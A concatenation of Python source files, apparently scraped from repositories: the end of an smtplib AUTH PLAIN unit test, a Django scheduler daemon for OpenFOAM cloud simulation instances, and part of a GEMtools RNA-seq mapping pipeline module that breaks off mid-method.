self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
scheduler_daemon.py
|
# Copyright (C) 2015-2017 XLAB, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
import threading
import time
import traceback
from importlib import import_module
import daemon
import daemon.pidfile
from django.conf import settings
import utils
from ofcloud.models import Instance
def do_work(sleep_interval):
import django
django.setup()
# create providers
simulation_providers = []
for provider_config in settings.PROVIDER_CONFIG:
package, module = provider_config.get('TYPE').rsplit('.', 1)
mod = import_module(package)
provider = getattr(mod, module)
simulation_providers.append(provider(provider_config.get('NAME'), provider_config))
threads = {
'shutdown': None,
'reconstruct': None,
'run': None,
'prepare': None
}
while True:
if not threads['shutdown'] or not threads['shutdown'].isAlive():
threads['shutdown'] = threading.Thread(target=__poll_for_shutdown, args=(simulation_providers,))
threads['shutdown'].start()
if not threads['reconstruct'] or not threads['reconstruct'].isAlive():
threads['reconstruct'] = threading.Thread(target=__poll_for_reconstruction, args=(simulation_providers,))
threads['reconstruct'].start()
if not threads['run'] or not threads['run'].isAlive():
threads['run'] = threading.Thread(target=__poll_for_run, args=(simulation_providers,))
threads['run'].start()
if not threads['prepare'] or not threads['prepare'].isAlive():
threads['prepare'] = threading.Thread(target=__poll_for_prepare, args=(simulation_providers,))
threads['prepare'].start()
time.sleep(sleep_interval)
def __poll_for_shutdown(simulation_providers):
"""
Polls instances ready for shutdown.
Instances qualify for shutdown if they are either in Instance.Status.RUNNING or Instance.Status.RECONSTRUCTING
state and the openFOAM thread is terminated. Orphaned instances are sent to Instance.Status.COMPLETE state.
:param simulation_providers:
:return:
"""
print "Polling instances for shutdown"
for provider in simulation_providers:
provider_id = provider.get_provider_id()
print "Using provider %s" % provider_id
running_instances, orphans_1 = provider.split_running_and_orphaned_instances(
Instance.objects.filter(status=Instance.Status.RUNNING.name, provider=provider_id))
reconstructing_instances, orphans_2 = provider.split_running_and_orphaned_instances(
Instance.objects.filter(status=Instance.Status.RECONSTRUCTING.name, provider=provider_id))
orphaned_instances = orphans_1 + orphans_2
# Mark any orphaned instance objects as complete
utils.update_instance_status(orphaned_instances, Instance.Status.COMPLETE.name)
finished_instances = utils.get_instances_with_finished_openfoam_thread(
running_instances + reconstructing_instances)
if len(finished_instances) or len(running_instances) or len(orphaned_instances):
print "Running/Finished/Orphaned: %d/%d/%d" % (
len(running_instances), len(finished_instances), len(orphaned_instances))
provider.shutdown_instances(finished_instances)
utils.update_instance_status(finished_instances, Instance.Status.COMPLETE.name)
def __poll_for_reconstruction(simulation_providers):
"""
Polls instances ready for reconstruction and runs reconstructPar command on them.
Instances qualify for reconstruction if they are in Instance.Status.RUNNING_MPI state and the openFOAM thread
is terminated. Orphaned instances are sent to Instance.Status.COMPLETE state.
:param simulation_providers:
:return:
"""
print "Polling instances for reconstruction"
for provider in simulation_providers:
provider_id = provider.get_provider_id()
print "Using provider %s" % provider_id
running_mpi_instances, orphaned_instances = provider.split_running_and_orphaned_instances(
Instance.objects.filter(status=Instance.Status.RUNNING_MPI.name, provider=provider_id))
utils.update_instance_status(orphaned_instances, Instance.Status.COMPLETE.name)
ready_for_reconstruction = utils.get_instances_with_finished_openfoam_thread(running_mpi_instances)
for instance in ready_for_reconstruction:
provider.run_reconstruction(instance)
def __poll_for_prepare(simulation_providers):
"""
Polls instances ready for preparation of openFOAM.
Instances qualify for preparation if they are in Instance.Status.PENDING state.
:param simulation_providers:
:return:
"""
print "Polling instances for preparation"
pending_instances = Instance.objects.filter(status=Instance.Status.PENDING.name)
print('Found %d instances in PENDING state.' % len(pending_instances))
for instance in pending_instances:
utils.prepare_simulation_instance(instance, simulation_providers)
def __poll_for_run(simulation_providers):
"""
Polls instances ready to run openFOAM simulations.
Instances qualify for running if they are in Instance.Status.READY state or in Instance.Status.DECOMPOSING state
with openFOAM thread terminated.
:param simulation_providers:
:return:
"""
decomposing_instances = Instance.objects.filter(status=Instance.Status.DECOMPOSING.name)
finished_decomposing_instances = utils.get_instances_with_finished_openfoam_thread(decomposing_instances)
utils.update_instance_status(finished_decomposing_instances, Instance.Status.READY.name)
print "Polling instances for run simulation"
ready_instances = Instance.objects.filter(status=Instance.Status.READY.name)
print('Found %d instances in READY state.' % len(ready_instances))
for ready_instance in ready_instances:
instance_provider = [provider for provider in simulation_providers if
provider.id == ready_instance.provider]
instance_provider[0].run_simulation(ready_instance)
def __kill_and_wait(pid):
os.kill(pid, signal.SIGTERM)
i = 0
while True:
try:
time.sleep(1)
os.kill(pid, signal.SIG_DFL)
i += 1
# sometimes the process does not go down gracefully, try to kill it every 10 seconds
if i % 10 == 0:
os.kill(pid, signal.SIGKILL)
except OSError:
return
def run(sleep_interval):
pidfile = daemon.pidfile.PIDLockFile(path="/tmp/scheduler_daemon.pid")
if pidfile.is_locked():
print "Existing lock file found"
try:
os.kill(pidfile.read_pid(), signal.SIG_DFL)
print "An instance of scheduler daemon is already running. If you wish to restart, use the 'restart' " \
"command"
return
except:
pidfile.break_lock()
now_seconds = str(time.time())
stdout = open("/tmp/scheduler_daemon_%s.log" % now_seconds, "w+")
stderr = open("/tmp/scheduler_daemon_error_%s.log" % now_seconds, "w+")
print "Running scheduler daemon with refresh interval of %s seconds" % sleep_interval
daemon_context = daemon.DaemonContext(stdout=stdout,
stderr=stderr,
detach_process=True,
pidfile=pidfile,
working_directory=os.getcwd())
with daemon_context:
do_work(sleep_interval)
def shutdown():
pidfile = daemon.pidfile.PIDLockFile(path="/tmp/scheduler_daemon.pid")
if pidfile.is_locked():
pid = pidfile.read_pid()
try:
os.kill(pid, signal.SIG_DFL)
except OSError:
print "There doesn't seem to be any instance of scheduler daemon running but the lock file exists"
print "Breaking lock file"
pidfile.break_lock()
return 0
try:
print "Shutting down scheduler daemon (%d)" % pid
__kill_and_wait(pid)
pidfile.break_lock()
print "Scheduler daemon (%d) successfully terminated" % pid
return 1
except OSError:
print traceback.format_exc()
else:
print "There doesn't seem to be any instance of scheduler daemon running"
return 0
def restart(sleep_interval):
print "Restarting scheduler daemon with refresh interval of %s seconds" % sleep_interval
shutdown_status = shutdown()
if shutdown_status == 1:
run(sleep_interval)
else:
print "To start a new instance use the 'runscheduler' command"
|
pipeline.py
|
#!/usr/bin/env
"""Pipeline utilities"""
import gem
import json
import logging
import os
import errno
import signal
import traceback
from gem.utils import Timer
import gem.gemtools as gt
import gem.filter
import gem.utils
class dotdict(dict):
def __getattr__(self, attr):
return self.get(attr, None)
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
class PipelineError(Exception):
"""Exception thrown by the mapping pipeline"""
def __init__(self, message):
self.message = message
class PipelineStep(object):
"""General mapping pipeline step"""
def __init__(self, name, dependencies=None, final=False, description="",
name_suffix=None, file_suffix=None):
self.id = None
self.name = name
self.name_suffix = name_suffix
self.file_suffix = file_suffix
self.description = description
self.pipeline = None
self.dependencies = []
self._files = None
self.configuration = None
self.final = final
if dependencies is not None:
self.dependencies.extend(dependencies)
def prepare(self, id, pipeline, configuration):
"""Implement this to prepare the step"""
self.pipeline = pipeline
self.id = id
self.configuration = configuration
# initialize files
self.files()
def run(self, final=False):
"""Implement this method to execute the step"""
pass
def cleanup(self, force=False):
if force or (not self.final and self.pipeline.remove_temp):
for f in self.files():
if os.path.exists(f):
logging.gemtools.debug("Remove temporary file %s" % f)
os.remove(f)
def files(self):
"""Return the output files generated by this step.
By default one .map output file is generated
"""
if self._files is None:
self._files = []
self._files.append(self.pipeline.create_file_name(self.name,
name_suffix=self.name_suffix,
file_suffix=self.file_suffix,
final=self.final))
return self._files
def _compress(self):
"""Returns true if this step needs compression for
all output
"""
return self.pipeline.compress_all
def _output(self):
"""Return the output file if its not final
step, otherwise return none
"""
if self.final:
return None
else:
return self._final_output()
def _final_output(self):
"""Return the last file created by this step"""
return self.files()[-1]
def _input(self, raw=False):
"""Return pipeline input if this step
has no dependencies or the
output of the last dependency
"""
if self.dependencies is None or len(self.dependencies) == 0:
return self.pipeline.open_input()
return self.pipeline.open_step(self.dependencies[-1], raw=raw)
def open(self, raw=False):
"""Open the steps output. The default implementation
opnes the last file"""
fs = self.files()
if len(fs) > 0:
if raw:
logging.gemtools.debug("Returning raw step %s output : %s", self.name, fs[-1])
return fs[-1]
else:
logging.gemtools.debug("Opening step %s output : %s", self.name, fs[-1])
return gem.files.open(fs[-1])
else:
logging.error("Step does not produce output files! Unable to open output")
return None
def is_done(self):
"""Return true if this step is done and
does not need execution
The basic implementation checks if all files exists
"""
for f in self.files():
if not os.path.exists(f):
return False
return True
class PrepareInputStep(PipelineStep):
"""Prepare multiple input files,
clean ids and write uncompressd file
"""
def files(self):
if self._files is None:
self._files = []
self._files.append(self.pipeline.create_file_name(self.name, file_suffix="gt.fastq", final=self.final))
return self._files
def __write(self):
outfile = gt.OutputFile(self._final_output(), clean_id=self.configuration['paired'], append_extra=False)
infile = self._input()
infile.write_stream(outfile, write_map=False)
infile.close()
outfile.close()
def run(self):
"""Merge current set of mappings and delete last ones"""
# p = mp.Process(target=PrepareInputStep.__write, args=(self,))
# p.start()
# p.join()
outfile = gt.OutputFile(self._final_output(), clean_id=self.configuration['paired'], append_extra=False)
infile = self._input()
infile.write_stream(outfile, write_map=False)
infile.close()
outfile.close()
class MergeStep(PipelineStep):
"""Merge up to the current step"""
def run(self):
"""Merge current set of mappings and delete last ones"""
same_content = self.configuration.get("same_content", True)
inputs = self._input()
master = inputs[0]
slaves = inputs[1:]
mapping = gem.merge(master, slaves, output=self._output(),
threads=self.pipeline.threads,
same_content=same_content,
paired=False,
compress=self._compress())
if self.final:
gem.score(mapping, self.configuration["index"], self._final_output(),
filter=self.pipeline.filter,
threads=max(2, self.pipeline.threads / 2),
quality=self.pipeline.quality,
compress=self.pipeline.compress
)
def _input(self):
"""Return the output of all
dependencies"""
if not self.dependencies:
raise PipelineError("You have to specify what to merge!")
return [self.pipeline.open_step(i) for i in self.dependencies if i >= 0]
class FilterStep(PipelineStep):
"""Filter the result mapping"""
def files(self):
if self._files is None:
self._files = []
self._files.append(
self.pipeline.create_file_name(
self.name,
name_suffix=".filtered",
file_suffix="map",
final=self.final))
return self._files
def run(self):
cfg = self.configuration
inputs = self._input()
gem.filter.rnaseq_filter(
inputs,
output=self._final_output(),
compress=self.pipeline.compress,
annotation=cfg['annotation'],
min_intron=cfg['min_intron'],
min_block=cfg['min_block'],
max_strata=cfg['max_strata'],
level=cfg['level'],
max_multi_maps=cfg['max_multi_maps'],
gene_pairing=cfg['filter_annotation'] if cfg['annotation'] is not None else False,
junction_filter=cfg['filter_annotation'] if cfg['annotation'] is not None else False,
threads=self.pipeline.threads,
keep_unique=True,
)
class MergeAndPairStep(PipelineStep):
"""Do merging and pairing in one single step"""
def run(self):
cfg = self.configuration
same_content = self.configuration.get("same_content", True)
inputs = self._input()
master = inputs[0]
slaves = inputs[1:]
mapping = gem.merge(master, slaves, output=None,
threads=max(1, self.pipeline.threads / 2), # self.pipeline.threads,
same_content=same_content,
paired=False,
compress=self._compress())
pair_mapping = gem.pairalign(
mapping,
cfg["index"],
self._output(),
quality_threshold=cfg["quality_threshold"],
max_decoded_matches=cfg["max_decoded_matches"],
min_decoded_strata=cfg["min_decoded_strata"],
min_insert_size=cfg["min_insert_size"],
max_insert_size=cfg["max_insert_size"],
max_edit_distance=cfg["max_edit_distance"],
min_matched_bases=cfg["min_matched_bases"],
max_extendable_matches=cfg["max_extendable_matches"],
max_matches_per_extension=cfg["max_matches_per_extension"],
threads=max(1, self.pipeline.threads / 2), # self.pipeline.threads,
filter_max_matches=0,
quality=self.pipeline.quality,
compress=self._compress())
if self.final:
gem.score(pair_mapping, cfg["index"], self._final_output(),
filter=self.pipeline.filter,
threads=max(1, self.pipeline.threads / 2),
quality=self.pipeline.quality,
compress=self.pipeline.compress,
raw=True)
def _input(self):
"""Return the output of all
dependencies"""
if not self.dependencies:
raise PipelineError("You have to specify what to merge!")
return [self.pipeline.open_step(i) for i in self.dependencies if i >= 0]
class CreateStatsStep(PipelineStep):
"""Create stats file"""
def files(self):
if self._files is None:
self._files = []
s = self.name_suffix if self.name_suffix is not None else ""
self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.stats" % s, file_suffix="txt", final=self.final))
self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.stats" % s, file_suffix="json", final=self.final))
return self._files
def run(self):
cfg = self.configuration
outputs = self.files()
infile = self._input()
gem.stats(infile, output=outputs[0], json_output=outputs[1],
paired=cfg['paired'],
threads=self.pipeline.threads)
class CreateGtfStatsStep(PipelineStep):
"""Create gtf stats file"""
def files(self):
if self._files is None:
self._files = []
s = self.name_suffix if self.name_suffix is not None else ""
self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.counts" % s, file_suffix="txt", final=self.final))
self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.stats" % s, file_suffix="json", final=self.final))
self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.stats" % s, file_suffix="txt", final=self.final))
return self._files
def run(self):
cfg = self.configuration
infile = self._input()
output = self._final_output()
gene_counts = self._files[0]
json_stats = self._files[1]
counts_weighted = cfg['counts_weighted']
counts_multimaps = cfg['counts_multimaps']
counts_exon_threshold = cfg['counts_exon_threshold']
gem.gtfcounts(infile, cfg['annotation'], output=output,
counts=gene_counts, json_output=json_stats,
threads=self.pipeline.threads, weight=counts_weighted,
multimaps=counts_multimaps, paired=cfg['paired'],
coverage=True,
exon_threshold=counts_exon_threshold)
class CreateBamStep(PipelineStep):
"""Create BAM file"""
# def files(self):
#if self._files is None:
#self._files = []
#self._files.append(self.pipeline.create_file_name(self.name, file_suffix="bam", final=self.final))
#return self._files
def run(self):
cfg = self.configuration
sam = gem.gem2sam(self._input(), cfg["index"],
threads=self.pipeline.threads,
quality=self.pipeline.quality,
consensus=cfg['consensus'],
exclude_header=cfg['sam_no_seq_header'],
compact=cfg['sam_compact'],
single_end=not cfg['paired'],
calc_xs=cfg['calc_xs'])
gem.sam2bam(sam, self._final_output(), sorted=cfg["sort"], mapq=cfg["mapq"], threads=self.pipeline.threads, sort_memory=self.pipeline.sort_memory)
class IndexBamStep(PipelineStep):
"""Index BAM file"""
#def files(self):
#if self._files is None:
#self._files = []
#self._files.append(self.pipeline.create_file_name(self.name, file_suffix="bam.bai", final=self.final))
#return self._files
def run(self):
#cfg = self.configuration
gem.bamIndex(self._input(raw=True), self._final_output())
class MapStep(PipelineStep):
"""Mapping step"""
def run(self):
cfg = self.configuration
mapping = gem.mapper(
self._input(),
cfg["index"],
self._output(),
mismatches=cfg["mismatches"],
quality_threshold=cfg["quality_threshold"],
max_decoded_matches=cfg["max_decoded_matches"],
min_decoded_strata=cfg["min_decoded_strata"],
min_matched_bases=cfg["min_matched_bases"],
max_big_indel_length=cfg["max_big_indel_length"],
max_edit_distance=cfg["max_edit_distance"],
mismatch_alphabet=cfg["mismatch_alphabet"],
delta=cfg["strata_after_best"],
trim=cfg["trim"],
quality=self.pipeline.quality,
threads=self.pipeline.threads,
compress=self._compress()
)
if self.final:
gem.score(mapping, cfg["index"], self._final_output(),
filter=self.pipeline.filter,
threads=max(2, self.pipeline.threads / 2),
quality=self.pipeline.quality,
compress=self.pipeline.compress
)
class PairalignStep(PipelineStep):
"""Pairalign"""
def run(self):
cfg = self.configuration
mapping = gem.pairalign(
self._input(),
cfg["index"],
self._output(),
quality_threshold=cfg["quality_threshold"],
max_decoded_matches=cfg["max_decoded_matches"],
min_decoded_strata=cfg["min_decoded_strata"],
min_insert_size=cfg["min_insert_size"],
max_insert_size=cfg["max_insert_size"],
max_edit_distance=cfg["max_edit_distance"],
min_matched_bases=cfg["min_matched_bases"],
max_extendable_matches=cfg["max_extendable_matches"],
max_matches_per_extension=cfg["max_matches_per_extension"],
threads=self.pipeline.threads,
quality=self.pipeline.quality,
compress=self._compress())
if self.final:
gem.score(mapping, cfg["index"], self._final_output(),
filter=self.pipeline.filter,
threads=max(2, self.pipeline.threads / 2),
quality=self.pipeline.quality,
compress=self.pipeline.compress)
class CreateDenovoTranscriptomeStep(PipelineStep):
"""Create denovo transcriptome"""
def files(self):
"""Return the output files generated by this step.
By default one .map output file is generated
"""
if self._files is None:
self._files = []
index_denovo_out = self.pipeline.create_file_name(self.name, file_suffix="gem")
junctions_out = self.pipeline.create_file_name(self.name, file_suffix="junctions")
denovo_out = self.pipeline.create_file_name("", file_suffix="junctions")
denovo_keys = junctions_out + ".keys"
self._files.append(index_denovo_out)
self._files.append(junctions_out)
self._files.append(junctions_out + ".fa")
self._files.append(denovo_keys)
self._files.append(denovo_out)
self._files.append(index_denovo_out[:-4] + ".log")
self.index_denovo_out = index_denovo_out
self.junctions_out = junctions_out
self.denovo_keys = denovo_keys
self.denovo_out = denovo_out
return self._files
def run(self):
"""Create the denovo transcriptome"""
cfg = self.configuration
(gtf_junctions, junctions_gtf_out) = self.pipeline.gtf_junctions()
denovo_junctions = gem.extract_junctions(
self._input(),
cfg["index"],
filter=cfg["filter"],
splice_consensus=cfg["junctions_consensus"],
mismatches=cfg["mismatches"],
threads=self.pipeline.threads,
strata_after_first=cfg["strata_after_best"],
coverage=cfg["coverage"],
min_split=cfg["min_split_length"],
max_split=cfg["max_split_length"],
refinement_step_size=cfg["refinement_step_size"],
min_split_size=cfg["min_split_size"],
matches_threshold=cfg["matches_threshold"],
max_junction_matches=cfg["max_junction_matches"],
annotation=cfg['annotation']
)
logging.gemtools.gt("Found Denovo Junctions %d with coverage >= %s" % (len(denovo_junctions), str(cfg["coverage"])))
filtered_denovo_junctions = set(gem.junctions.filter_by_distance(denovo_junctions, cfg["min_split_length"], cfg["max_split_length"]))
logging.gemtools.gt("Denovo junction passing distance filter (min: %d max: %d): %d (%d removed)" % (cfg["min_split_length"], cfg["max_split_length"],
len(filtered_denovo_junctions), (len(denovo_junctions) - len(filtered_denovo_junctions))))
gem.junctions.write_junctions(filtered_denovo_junctions, self.denovo_out, cfg["index"])
if gtf_junctions is not None:
logging.gemtools.gt("Joining with Annotation - denovo: %d annotation: %d" % (len(filtered_denovo_junctions), len(gtf_junctions)))
junctions = gtf_junctions.union(filtered_denovo_junctions)
logging.gemtools.gt("Joined Junctions %d" % (len(junctions)))
gem.junctions.write_junctions(junctions, self.junctions_out, cfg["index"])
else:
logging.gemtools.gt("Skipped merging with annotation, denovo junctions: %d" % (len(filtered_denovo_junctions)))
gem.junctions.write_junctions(filtered_denovo_junctions, self.junctions_out, cfg["index"])
logging.gemtools.gt("Computing denovo transcriptome")
max_len = self.pipeline.max_read_length
if max_len <= 0:
logging.gemtools.gt("Calculating max read length")
max_len = gem.utils.get_max_read_length(self._input(),
threads=self.pipeline.threads)
if max_len < 0:
raise PipelineError("Unable to calculate max read length: %s" % file)
logging.gemtools.gt("Max read length: %d", max_len)
(denovo_transcriptome, denovo_keys) = gem.compute_transcriptome(max_len, cfg["index"], self.junctions_out, junctions_gtf_out)
logging.gemtools.gt("Indexing denovo transcriptome")
gem.index(denovo_transcriptome, self.index_denovo_out, threads=self.pipeline.threads)
return (self.index_denovo_out, self.denovo_keys)
def cleanup(self, force=False):
if force or (not self.final and self.pipeline.remove_temp):
keep = [self.junctions_out, self.denovo_keys, self.denovo_out]
for f in self.files():
if os.path.exists(f) and f not in keep:
logging.gemtools.debug("Remove temporary file %s" % f)
os.remove(f)
def is_done(self):
"""Make sure we ignore the log file generated by the indexer"""
keep = [self.junctions_out, self.denovo_keys, self.denovo_out]
for f in keep:
if not os.path.exists(f) and not f.endswith(".log"):
return False
return True
class ExtractJunctionsStep(PipelineStep):
"""Extract denovo junctions"""
def files(self):
if self._files is None:
self._files = []
junctions_out = self.pipeline.create_file_name(self.name, file_suffix="junctions", final=self.final)
self._files.append(junctions_out)
self.junctions_out = junctions_out
return self._files
def run(self):
"""Extract denovo junctions"""
cfg = self.configuration
denovo_junctions = gem.extract_junctions(
self._input(),
cfg["index"],
filter=cfg["filter"],
splice_consensus=cfg["junctions_consensus"],
mismatches=cfg["mismatches"],
threads=self.pipeline.threads,
strata_after_first=cfg["strata_after_best"],
coverage=cfg["coverage"],
min_split=cfg["min_split_length"],
max_split=cfg["max_split_length"],
refinement_step_size=cfg["refinement_step_size"],
min_split_size=cfg["min_split_size"],
matches_threshold=cfg["matches_threshold"],
max_junction_matches=cfg["max_junction_matches"],
annotation=cfg["annotation"],
)
logging.gemtools.gt("Found de-novo Junctions %d with coverage >= %s" % (len(denovo_junctions), str(cfg["coverage"])))
filtered_denovo_junctions = set(gem.junctions.filter_by_distance(denovo_junctions, cfg["min_split_length"], cfg["max_split_length"]))
logging.gemtools.gt("de-novo junction passing distance filter (min: %s max: %s): %d (%s removed)" % (str(cfg["min_split_length"]), str(cfg["max_split_length"]),
len(filtered_denovo_junctions), (len(denovo_junctions) - len(filtered_denovo_junctions))))
gem.junctions.write_junctions(filtered_denovo_junctions, self.junctions_out, cfg["index"])
return self.junctions_out
class SplitMapStep(PipelineStep):
"""Call the split mapper"""
def run(self):
"""Extract denovo junctions"""
cfg = self.configuration
splitmap = gem.splitmapper(self._input(),
cfg["index"],
output=self._final_output(),
mismatches=cfg["mismatches"],
splice_consensus=cfg["junctions_consensus"],
filter=cfg["filter"],
refinement_step_size=cfg["refinement_step_size"],
min_split_size=cfg["min_split_size"],
matches_threshold=cfg["matches_threshold"],
strata_after_first=cfg["strata_after_best"],
mismatch_alphabet=cfg["mismatch_alphabet"],
quality=self.pipeline.quality,
trim=cfg["trim"],
filter_splitmaps=True,
post_validate=True,
threads=self.pipeline.threads,
extra=None)
return splitmap
class TranscriptMapStep(PipelineStep):
"""Transcript Mapping step"""
def prepare(self, id, pipeline, config):
PipelineStep.prepare(self, id, pipeline, config)
if config["denovo"]:
# denovo transcript mapping
if config["index"] is None or not os.path.exists(config["index"]):
# add denovo transript step
create_step_id = pipeline.create_transcriptome("denovo-index", dependencies=self.dependencies)
self.dependencies.append(create_step_id)
self.configuration["create_index"] = create_step_id
if config["index"] is None:
# update the configuration
config["index"] = pipeline.steps[create_step_id].index_denovo_out
config["keys"] = pipeline.steps[create_step_id].denovo_keys
# this is ugly but we have to increase the id here as we squeezed in another job
self.id = create_step_id + 1
def run(self):
cfg = self.configuration
if cfg["denovo"] and cfg["create_index"]:
step = self.pipeline.steps[cfg["create_index"]]
cfg["index"] = step.index_denovo_out
cfg["keys"] = step.denovo_keys
outfile = self.files()[0]
mapping = gem.mapper(
self._input(),
cfg["index"],
None, # None as we pipe through the filter
mismatches=cfg["mismatches"],
quality_threshold=cfg["quality_threshold"],
max_decoded_matches=cfg["max_decoded_matches"],
min_decoded_strata=cfg["min_decoded_strata"],
min_matched_bases=cfg["min_matched_bases"],
max_big_indel_length=cfg["max_big_indel_length"],
max_edit_distance=cfg["max_edit_distance"],
mismatch_alphabet=cfg["mismatch_alphabet"],
delta=cfg["strata_after_best"],
trim=cfg["trim"],
key_file=cfg["keys"],
quality=self.pipeline.quality,
threads=self.pipeline.threads
)
# filter for only split maps
gem.filter.only_split_maps(mapping,
outfile,
threads=self.pipeline.threads,
compress=self._compress())
def _input(self, raw=False):
"""Return pipeline input if this step
has no dependencies or the
output of the last dependency
"""
if self.configuration["denovo"]:
if self.dependencies is None or len(self.dependencies) == 1:
return self.pipeline.open_input()
return self.pipeline.open_step(self.dependencies[0], raw=raw)
else:
return PipelineStep._input(self, raw=raw)
class MappingPipeline(object):
"""General mapping pipeline class."""
def __init__(self, args=None):
self.steps = [] # pipeline steps
self.run_steps = [] # steps to run
# general parameter
self.input = None # input files
self.name = None # target name
self.index = None # genome index
self.output_dir = None # Output directory
self.annotation = None # GTF annotation to use
self.threads = 1 # number of threads
self.max_read_length = 0 # max read length
self.transcript_index = None # transcriptome index
self.transcript_keys = None # transcriptome keys file
self.denovo_index = None # the denovo index to use
self.denovo_keys = None # the denovo keys to use
self.quality = None # quality offset
self.junctions_file = None # file with both denovo and GTF junctions
self.junctions_annotation = None # file with the annotation junctions
self.scoring_scheme = "+U,+u,-s,-t,+1,-i,-a" # scoring scheme
self.compress = True # compress final output
self.compress_all = False # also compress intermediate output
self.remove_temp = True # remove temporary
self.bam_mapq = 0 # filter bam content mapq
self.bam_create = True # create bam
self.bam_sort = True # sort bam
self.bam_index = True # index bam
self.sam_no_seq_header = False # exlude seq header
self.sam_compact = False # sam compact format
self.calc_xs = True # sam compact format
self.single_end = False # single end alignments
self.write_config = None # write configuration
self.dry = False # only dry run
self.sort_memory = "768M" # samtools sort memory
self.direct_input = False # if true, skip the preparation step
self.force = False # force computation of all steps
self.filter_max_matches = 25
self.filter_min_strata = 1
self.filter_max_strata = 2
self.filter = None
# genome mapping parameter
self.genome_mismatches = 0.06
self.genome_quality_threshold = 26
self.genome_max_decoded_matches = 25
self.genome_min_decoded_strata = 1
self.genome_min_matched_bases = 0.80
self.genome_max_big_indel_length = 15
self.genome_max_edit_distance = 0.20
self.genome_mismatch_alphabet = "ACGT"
self.genome_strata_after_best = 1
# transcript mapping parameter
self.transcript_mismatches = None # initialize from genom
self.transcript_quality_threshold = None # initialize from genome
self.transcript_max_decoded_matches = 150 # this need to be custom
self.transcript_min_decoded_strata = None # initialize from genome
self.transcript_min_matched_bases = None # initialize from genome
self.transcript_max_big_indel_length = None # initialize from genome
self.transcript_max_edit_distance = None # initialize from genome
self.transcript_mismatch_alphabet = None # initialize from genome
self.transcript_strata_after_best = None # initialize from genome
# junction detection parameter
self.junction_mismatches = 0.04
self.junctions_max_junction_matches = 5
self.junctions_min_intron_size = 4
self.junctions_max_intron_size = 500000
self.junctions_refinement_step_size = 2
self.junctions_min_split_size = 15
self.junctions_matches_threshold = 75
self.junctions_coverage = 2
self.junctions_filtering = "ordered,non-zero-distance"
self.junctions_consensus = gem.extended_splice_consensus
self.junctions_strata_after_best = 0
# pair alignment parameter
self.pairing_quality_threshold = None
self.pairing_max_decoded_matches = 25
self.pairing_min_decoded_strata = 1
self.pairing_min_insert_size = 0
self.pairing_max_insert_size = None
self.pairing_max_edit_distance = 0.30
self.pairing_min_matched_bases = 0.80
self.pairing_max_extendable_matches = 0
self.pairing_max_matches_per_extension = 0
# stats parameter
self.stats_create = True
self.stats_json = True
# filtering parameter
self.filtered_create = True
self.filter_annotation = True
self.filter_intron_length = 20
self.filter_block_length = 5
self.filter_level = 0
self.filter_max_multi_maps = 5
self.filter_keep_unique = True
self.filter_max_error_events = 0
# gtf stats and counts
self.counts_create = True
self.counts_weighted = True
self.counts_multimaps = True
self.counts_exon_threshold = 1.0
if args is not None:
# initialize from arguments
# load configuration
try:
if args.load_configuration is not None:
self.load(args.load_configuration)
except AttributeError:
pass
## update parameter
self.update(vars(args))
## initialize pipeline and check values
self.initialize()
def update(self, configuration):
"""Update configuration from given map
configuration -- the input configuration
"""
for k, v in configuration.items():
try:
if v is not None:
setattr(self, k, v)
except AttributeError:
pass
def __update_dict(self, target, source):
if source is None:
return
for k, v in source.items():
#if v is not None:
target[k] = v
def map(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add mapping step"""
step = MapStep(name, final=final, dependencies=dependencies, description=description, file_suffix="map")
config = dotdict()
